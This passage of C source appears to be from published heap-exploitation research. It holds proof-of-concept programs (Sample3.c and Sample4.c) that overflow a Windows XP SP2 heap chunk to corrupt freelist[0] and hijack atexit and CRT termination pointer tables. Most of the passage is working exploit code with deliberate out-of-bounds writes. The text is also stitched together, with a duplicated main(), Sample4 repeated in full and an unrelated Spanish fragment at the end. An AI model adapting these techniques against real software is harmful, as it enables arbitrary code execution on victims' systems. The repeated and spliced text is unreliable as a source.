 * MSVC/x86-only because of _asm.
 */
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample3.c\n");
printf("\tExploiting Freelist[0] Searching\n");
printf("\t-Overwriting atexit pointers\n");
printf("===========================================\n\n");
// Set up the atexit function (atexit()/exit() are declared in <stdlib.h>, not included directly -- TODO confirm via <windows.h>)
atexit(ExitFunction);
hHeap = HeapCreate(0,0,0); // HANDLE stored in a long (32-bit only); a NULL result is not checked
printf("Heap created: 0x%xh\n",hHeap); // %x with a long argument: format/type mismatch
create_vTable();
printf("vTable @ 0x%xh\n",&func); // %x with a pointer argument
// Call through the vTable: the slot at byte offset 8 (func[2], which create_vTable() set to callback3)
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable again, same slot
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
exit(0); // No "Exiting" print here: ExitFunction() prints it when the atexit handlers run
}
/*
Sample3.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Overwriting atexit pointers
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
To overwrite the atexit() ptr table we will:
1. overwrite a chunk in freelist[0]
2. exploit the freelist[0] searching routine to
return a pointer to the heap freelists
3. overwrite the freelists with a pointer to the atexit() ptr table
4. overwrite the atexit() ptr table to point to a portion of itself
containing the code to execute.
*/
#include <stdio.h>
#include <windows.h>
// Shared state for the demo: written by main() and create_vTable(), read by BlowHeap() and the asm calls in main().
DWORD func[20]; // Fake virtual function table filled by create_vTable(); each slot is a callback address stored as a DWORD (32-bit assumption)
long hHeap; // Handle returned by HeapCreate(); declared long rather than HANDLE, which only round-trips on a 32-bit build
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback1()
{
    fputs("Callback 1...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback2()
{
    fputs("Callback 2...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback3()
{
    fputs("Callback 3...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback4()
{
    fputs("Callback 4...\n", stdout);
}
/*
 * Sample3 demo body.  Same set-up as Sample2 (alloc A, B, C; free B; copy
 * 0x1c bytes into A so the freed chunk's header and FLINK are overwritten),
 * but newFLINK is a hard-coded address the original comment identifies as the
 * heap's freelists[].  The original comments then describe: the 0xCB8-byte
 * alloc returns that address, 256 bytes of a second hard-coded address (the
 * atexit pointer table) are copied over it, a further alloc returns a pointer
 * into that table, and 0x30 bytes are written there.  Every address here is
 * specific to the build the author used; nothing is computed at run time, so
 * the demo does not transfer even between builds.  Uses global hHeap.
 * memset()/memcpy() come from <string.h>, not included directly -- TODO
 * confirm via <windows.h>.
 */
void BlowHeap()
{
int x;
char *a,*b,*c,*d; // b and c are printed before they are assigned (see below)
char overflow[0x3000]; // Scratch buffer reused for each of the three copies below
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); // NULL return is not checked (same for every HeapAlloc below)
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // NOTE(review): b and c are uninitialised here (undefined behaviour); %x with pointer arguments is a format mismatch
printf("Alloc B\n"); // Alloc a large chunk so freed to freelist[0]
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // c still uninitialised
printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Freeing b\n"); // Free B to freelist[0]; b is dangling from here until it is reassigned below
HeapFree(hHeap,0,b);
printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk
newFLINK = 0x00340198; // Set the new FLINK to the freelists[] (hard-coded for the author's build)
newFLINK += 8; // Adjust
// Set up overflow: bytes [0,0x10) are filler; [0x10,0x1c) mimic the freed chunk's header and FLINK
memset(overflow,0x48,0x20);
overflow[0x10] = 0x01; // Size of this block (SMALL)
overflow[0x11] = 0x00;
overflow[0x12] = 0x01; // Size of previous block
overflow[0x13] = 0x00;
overflow[0x14] = 0x80;
overflow[0x15] = 0x80;
overflow[0x16] = 0x80;
overflow[0x17] = 0x80;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
// Do the overflow
memcpy(a,overflow,0x20-4); // 0x1c bytes into a 0x10-byte allocation: deliberate out-of-bounds write. Overwrite FLINK but not BLINK
printf("Alloc B\n"); // This alloc will return the address of the freelists[]
b = HeapAlloc(hHeap,0,0xCB8); // 3256 bytes
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Set up buffer: all 0x3000 bytes zeroed, then the first 256 bytes filled with one repeated address
memset(overflow,0x0,0x3000);
for(x=0;x<256;x+=4)
{
*(DWORD *) &overflow[x] = 0x40C0D0; // Overwrite with address of atexit ptrs (hard-coded for the author's build)
}
// copy it in
// This will overwrite the freelist structures (only 256 bytes are copied, not the 3256 of the allocation)
memcpy(b,overflow,256);
// This will return a ptr to the atexit pointers
printf("Alloc D\n");
d = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\td=%x\n",a,b,c,d);
// Now lets overwrite the AtExit Ptr Table
// Set up buffer of input size (48 bytes): four DWORDs followed by 0xCC filler
memset(overflow,0xCC,0x30);
*(DWORD *) &overflow[0] = 0x40C0D8+4; // 4 greater than lower pointer
*(DWORD *) &overflow[4] = 0x40C0D8; // Lower Pointer
*(DWORD *) &overflow[8] = 0x40C0D8+4; // ptr to Code to execute
*(DWORD *) &overflow[12]= 0xCCCCCCCC; // Code to execute (0xCC is the x86 int3 opcode, so a hit shows up as a debugger break rather than running anything)
// Overwrite atExit Pointers
memcpy(d,overflow,0x30);
}
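/*
 * Fill func[] so it can serve as a fake vtable: slots 0-3 get
 * callback1..callback4, every remaining slot gets callback1, and slots 0 and
 * 1 are then overwritten with the plain integers 5 and 6 (kept from the
 * original; the asm call in main() goes through byte offset 8, i.e. slot 2,
 * which is left intact).
 * Fix: the original wrote "(DWORD) func[i] = ...", a cast applied to an
 * lvalue, which is an MSVC extension rather than standard C; func[] is
 * already DWORD so the cast is simply dropped.  The slot count is taken from
 * the array instead of the literal 20.  Storing a function address in a DWORD
 * assumes a 32-bit build.
 */
void create_vTable()
{
    size_t x;
    const size_t slots = sizeof func / sizeof func[0];
    printf("Creating Virtual Function Table\n");
    func[0] = (DWORD) &callback1;
    func[1] = (DWORD) &callback2;
    func[2] = (DWORD) &callback3;
    func[3] = (DWORD) &callback4;
    for (x = 4; x < slots; x++) {
        func[x] = (DWORD) &callback1;
    }
    func[0] = 5;
    func[1] = 6;
}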
/* Registered with atexit() in main(); prints a marker when the process exits through the CRT. */
void ExitFunction()
{
    fputs("Exiting\n", stdout);
}
/*
 * Entry point.  Registers ExitFunction() with atexit(), creates a private
 * heap, builds the fake vtable in func[], calls through it via MSVC inline
 * asm (the slot at byte offset 8, i.e. func[2]) both before and after
 * BlowHeap(), and destroys the heap.  argc/argv are unused; exit(0) ends the
 * process (running the atexit handlers) so the return is never reached.
 * MSVC/x86-only because of _asm.
 */
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample3.c\n");
printf("\tExploiting Freelist[0] Searching\n");
printf("\t-Overwriting atexit pointers\n");
printf("===========================================\n\n");
// Set up the atexit function (atexit()/exit() are declared in <stdlib.h>, not included directly -- TODO confirm via <windows.h>)
atexit(ExitFunction);
hHeap = HeapCreate(0,0,0); // HANDLE stored in a long (32-bit only); a NULL result is not checked
printf("Heap created: 0x%xh\n",hHeap); // %x with a long argument: format/type mismatch
create_vTable();
printf("vTable @ 0x%xh\n",&func); // %x with a pointer argument
// Call through the vTable: the slot at byte offset 8 (func[2], which create_vTable() set to callback3)
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable again, same slot
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
exit(0); // No "Exiting" print here: ExitFunction() prints it when the atexit handlers run
}
/*
Sample4.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Overwriting CRT Termination Pointers
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
MSVCRT MUST BE DYNAMICALLY LINKED
To overwrite the termination ptr table we will:
1. overwrite a chunk in freelist[0]
2. exploit the freelist[0] linking routine to overwrite the heap pointer
to the lookaside list [base+0x580]
3. This will cause the lookaside list to contain our pointers to the termination() ptr table
4. overwrite the termination() ptr table to point to a portion of itself
containing the code to execute.
*/
#include <stdio.h>
#include <windows.h>
// Shared state for the demo: written by main() and create_vTable(), read by BlowHeap() and the asm calls in main().
DWORD func[20]; // Fake virtual function table filled by create_vTable(); each slot is a callback address stored as a DWORD (32-bit assumption)
long hHeap; // Handle returned by HeapCreate(); declared long rather than HANDLE, which only round-trips on a 32-bit build
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback1()
{
    fputs("Callback 1...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback2()
{
    fputs("Callback 2...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback3()
{
    fputs("Callback 3...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback4()
{
    fputs("Callback 4...\n", stdout);
}
/*
 * Sample4 demo body.  Follows the Sample1 relinking layout (header plus both
 * FLINK and BLINK overwritten; the banner in main() also says "ReLinking",
 * although the file header says "Searching"): allocate A, copy a large buffer
 * into its 0x10-byte allocation, then allocate B so the heap splits the last
 * free chunk and, per the original comments, writes the split chunk's address
 * to [newFLINK], which is a hard-coded heap address the comment identifies as
 * the lookaside-list pointer.  A further alloc C is then expected to return a
 * hard-coded CRT address, and 17 bytes are strcpy()'d there.  Every address is
 * specific to the author's build/DLL version; nothing is computed at run time.
 * Uses global hHeap; d is declared but never used.  memset()/memcpy()/strcpy()
 * come from <string.h>, not included directly -- TODO confirm via <windows.h>.
 */
void BlowHeap()
{
int x;
char *a,*b,*c,*d; // b and c are printed before they are assigned (see below); d is unused
char overflow[0x3000]; // Scratch buffer; see the memcpy() length note below
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); // NULL return is not checked (same for every HeapAlloc below)
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // NOTE(review): b and c are uninitialised here (undefined behaviour); %x with pointer arguments is a format mismatch
// Overwrite the last free chunk
printf("Overflowing chunk A into last free chunk\n");
newFLINK = 0x00340580; // Set the new flink (hard-coded for the author's build; the comment below calls it the lookaside pointer at base+0x580)
newFLINK = newFLINK -4; // Adjust
// Set up overflow: bytes [0,0x10) are filler; [0x10,0x20) mimic the free chunk's header and links; [0x20,0x400) filled by the loop
memset(overflow,0x58,0x200);
overflow[0x10] = 0x10; // Size of this block
overflow[0x11] = 0x01;
overflow[0x12] = 0x10; // Size of previous block
overflow[0x13] = 0x01;
overflow[0x14] = 0x99;
overflow[0x15] = 0x99;
overflow[0x16] = 0x99;
overflow[0x17] = 0x99;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
*(DWORD *) &overflow[0x1c] = newFLINK; // Put it in BLINK
for(x=32;x<1024;x+=4)
{
*(DWORD *) &overflow[x] = 0x77C6279C; // Overwrite free chunk data with address of termination ptrs (hard-coded for the author's msvcrt build)
}
// Do the overflow
memcpy(a,overflow,0x1024); // 0x1024 = 4132 bytes into a 0x10-byte allocation: deliberate out-of-bounds write. Only bytes [0,1024) of overflow were initialised, so [1024,4132) copy uninitialised stack data; 0x1024 may have been meant as decimal 1024 to match the loop bound -- cannot tell from here. Overflow chunk A, overwrite header and data of last free chunk
// When block B is allocated, the last free chunk will be split.
// The address of the split chunk will be written to [newFLINK]
// This will overwrite the pointer to the lookaside list @ [base+0x580h]
printf("Alloc B\n");
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x5); // Any amount will do as no lookaside/freelist yet
printf("a=%x\tb=%x\n",a,b);
// Now another alloc
// This will return a pointer from our overflow data above
// So C will point to the CRT termination pointer table
printf("Alloc C\n"); // Alloc a chunk
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x50);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Now lets overwrite the Termination Ptr Table: zero the buffer, then set four DWORDs (none contains a zero byte)
memset(overflow,0x0,0x3000);
*(DWORD *) &overflow[0] = 0x77C627A8; // 4 greater than lower pointer
*(DWORD *) &overflow[4] = 0x77C627A4; // Lower Pointer
*(DWORD *) &overflow[8] = 0x77C627A8; // ptr to Code to execute
*(DWORD *) &overflow[12]= 0xCCCCCCCC; // Code to execute (0xCC is the x86 int3 opcode, so a hit shows up as a debugger break rather than running anything)
// Overwrite Termination Pointers
strcpy(c,overflow); // Copies up to the first NUL: the 16 bytes above plus the terminator at overflow[16]
}
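/*
 * Fill func[] so it can serve as a fake vtable: slots 0-3 get
 * callback1..callback4, every remaining slot gets callback1, and slots 0 and
 * 1 are then overwritten with the plain integers 5 and 6 (kept from the
 * original; the asm call in main() goes through byte offset 8, i.e. slot 2,
 * which is left intact).
 * Fix: the original wrote "(DWORD) func[i] = ...", a cast applied to an
 * lvalue, which is an MSVC extension rather than standard C; func[] is
 * already DWORD so the cast is simply dropped.  The slot count is taken from
 * the array instead of the literal 20.  Storing a function address in a DWORD
 * assumes a 32-bit build.
 */
void create_vTable()
{
    size_t x;
    const size_t slots = sizeof func / sizeof func[0];
    printf("Creating Virtual Function Table\n");
    func[0] = (DWORD) &callback1;
    func[1] = (DWORD) &callback2;
    func[2] = (DWORD) &callback3;
    func[3] = (DWORD) &callback4;
    for (x = 4; x < slots; x++) {
        func[x] = (DWORD) &callback1;
    }
    func[0] = 5;
    func[1] = 6;
}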
/*
 * Entry point.  Creates a private heap, builds the fake vtable in func[],
 * calls through it via MSVC inline asm (the slot at byte offset 8, i.e.
 * func[2]) both before and after BlowHeap(), and destroys the heap.
 * argc/argv are unused; exit(0) ends the process so the return is never
 * reached.  MSVC/x86-only because of _asm.  The banner says "ReLinking"
 * while the file header says "Searching"; the BlowHeap() body matches the
 * relinking layout of Sample1.
 */
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample4.c\n");
printf("\tExploiting Freelist[0] ReLinking\n");
printf("\t-Overwriting termination pointers\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0); // HANDLE stored in a long (32-bit only); a NULL result is not checked
printf("Heap created: 0x%xh\n",hHeap); // %x with a long argument: format/type mismatch
create_vTable();
printf("Callback @ 0x%xh\n",&func); // %x with a pointer argument
// Call through the vTable: the slot at byte offset 8 (func[2], which create_vTable() set to callback3)
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable again, same slot
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0); // exit() is declared in <stdlib.h>, which this file does not include directly -- TODO confirm it arrives via <windows.h>
}
/*
Sample4.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Overwriting CRT Termination Pointers
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
MSVCRT MUST BE DYNAMICALLY LINKED
To overwrite the termination ptr table we will:
1. overwrite a chunk in freelist[0]
2. exploit the freelist[0] linking routine to overwrite the heap pointer
to the lookaside list [base+0x580]
3. This will cause the lookaside list to contain our pointers to the termination() ptr table
4. overwrite the termination() ptr table to point to a portion of itself
containing the code to execute.
*/
#include <stdio.h>
#include <windows.h>
// Shared state for the demo: written by main() and create_vTable(), read by BlowHeap() and the asm calls in main().
DWORD func[20]; // Fake virtual function table filled by create_vTable(); each slot is a callback address stored as a DWORD (32-bit assumption)
long hHeap; // Handle returned by HeapCreate(); declared long rather than HANDLE, which only round-trips on a 32-bit build
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback1()
{
    fputs("Callback 1...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback2()
{
    fputs("Callback 2...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback3()
{
    fputs("Callback 3...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback4()
{
    fputs("Callback 4...\n", stdout);
}
/*
 * Sample4 demo body.  Follows the Sample1 relinking layout (header plus both
 * FLINK and BLINK overwritten; the banner in main() also says "ReLinking",
 * although the file header says "Searching"): allocate A, copy a large buffer
 * into its 0x10-byte allocation, then allocate B so the heap splits the last
 * free chunk and, per the original comments, writes the split chunk's address
 * to [newFLINK], which is a hard-coded heap address the comment identifies as
 * the lookaside-list pointer.  A further alloc C is then expected to return a
 * hard-coded CRT address, and 17 bytes are strcpy()'d there.  Every address is
 * specific to the author's build/DLL version; nothing is computed at run time.
 * Uses global hHeap; d is declared but never used.  memset()/memcpy()/strcpy()
 * come from <string.h>, not included directly -- TODO confirm via <windows.h>.
 */
void BlowHeap()
{
int x;
char *a,*b,*c,*d; // b and c are printed before they are assigned (see below); d is unused
char overflow[0x3000]; // Scratch buffer; see the memcpy() length note below
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); // NULL return is not checked (same for every HeapAlloc below)
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // NOTE(review): b and c are uninitialised here (undefined behaviour); %x with pointer arguments is a format mismatch
// Overwrite the last free chunk
printf("Overflowing chunk A into last free chunk\n");
newFLINK = 0x00340580; // Set the new flink (hard-coded for the author's build; the comment below calls it the lookaside pointer at base+0x580)
newFLINK = newFLINK -4; // Adjust
// Set up overflow: bytes [0,0x10) are filler; [0x10,0x20) mimic the free chunk's header and links; [0x20,0x400) filled by the loop
memset(overflow,0x58,0x200);
overflow[0x10] = 0x10; // Size of this block
overflow[0x11] = 0x01;
overflow[0x12] = 0x10; // Size of previous block
overflow[0x13] = 0x01;
overflow[0x14] = 0x99;
overflow[0x15] = 0x99;
overflow[0x16] = 0x99;
overflow[0x17] = 0x99;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
*(DWORD *) &overflow[0x1c] = newFLINK; // Put it in BLINK
for(x=32;x<1024;x+=4)
{
*(DWORD *) &overflow[x] = 0x77C6279C; // Overwrite free chunk data with address of termination ptrs (hard-coded for the author's msvcrt build)
}
// Do the overflow
memcpy(a,overflow,0x1024); // 0x1024 = 4132 bytes into a 0x10-byte allocation: deliberate out-of-bounds write. Only bytes [0,1024) of overflow were initialised, so [1024,4132) copy uninitialised stack data; 0x1024 may have been meant as decimal 1024 to match the loop bound -- cannot tell from here. Overflow chunk A, overwrite header and data of last free chunk
// When block B is allocated, the last free chunk will be split.
// The address of the split chunk will be written to [newFLINK]
// This will overwrite the pointer to the lookaside list @ [base+0x580h]
printf("Alloc B\n");
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x5); // Any amount will do as no lookaside/freelist yet
printf("a=%x\tb=%x\n",a,b);
// Now another alloc
// This will return a pointer from our overflow data above
// So C will point to the CRT termination pointer table
printf("Alloc C\n"); // Alloc a chunk
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x50);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Now lets overwrite the Termination Ptr Table: zero the buffer, then set four DWORDs (none contains a zero byte)
memset(overflow,0x0,0x3000);
*(DWORD *) &overflow[0] = 0x77C627A8; // 4 greater than lower pointer
*(DWORD *) &overflow[4] = 0x77C627A4; // Lower Pointer
*(DWORD *) &overflow[8] = 0x77C627A8; // ptr to Code to execute
*(DWORD *) &overflow[12]= 0xCCCCCCCC; // Code to execute (0xCC is the x86 int3 opcode, so a hit shows up as a debugger break rather than running anything)
// Overwrite Termination Pointers
strcpy(c,overflow); // Copies up to the first NUL: the 16 bytes above plus the terminator at overflow[16]
}
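/*
 * Fill func[] so it can serve as a fake vtable: slots 0-3 get
 * callback1..callback4, every remaining slot gets callback1, and slots 0 and
 * 1 are then overwritten with the plain integers 5 and 6 (kept from the
 * original; the asm call in main() goes through byte offset 8, i.e. slot 2,
 * which is left intact).
 * Fix: the original wrote "(DWORD) func[i] = ...", a cast applied to an
 * lvalue, which is an MSVC extension rather than standard C; func[] is
 * already DWORD so the cast is simply dropped.  The slot count is taken from
 * the array instead of the literal 20.  Storing a function address in a DWORD
 * assumes a 32-bit build.
 */
void create_vTable()
{
    size_t x;
    const size_t slots = sizeof func / sizeof func[0];
    printf("Creating Virtual Function Table\n");
    func[0] = (DWORD) &callback1;
    func[1] = (DWORD) &callback2;
    func[2] = (DWORD) &callback3;
    func[3] = (DWORD) &callback4;
    for (x = 4; x < slots; x++) {
        func[x] = (DWORD) &callback1;
    }
    func[0] = 5;
    func[1] = 6;
}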
/*
 * Entry point.  Creates a private heap, builds the fake vtable in func[],
 * calls through it via MSVC inline asm (the slot at byte offset 8, i.e.
 * func[2]) both before and after BlowHeap(), and destroys the heap.
 * argc/argv are unused; exit(0) ends the process so the return is never
 * reached.  MSVC/x86-only because of _asm.  The banner says "ReLinking"
 * while the file header says "Searching"; the BlowHeap() body matches the
 * relinking layout of Sample1.
 */
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample4.c\n");
printf("\tExploiting Freelist[0] ReLinking\n");
printf("\t-Overwriting termination pointers\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0); // HANDLE stored in a long (32-bit only); a NULL result is not checked
printf("Heap created: 0x%xh\n",hHeap); // %x with a long argument: format/type mismatch
create_vTable();
printf("Callback @ 0x%xh\n",&func); // %x with a pointer argument
// Call through the vTable: the slot at byte offset 8 (func[2], which create_vTable() set to callback3)
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable again, same slot
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0); // exit() is declared in <stdlib.h>, which this file does not include directly -- TODO confirm it arrives via <windows.h>
}










, es más fácil el manejo, así solo lo descargas; solo una sugerencia, por favor.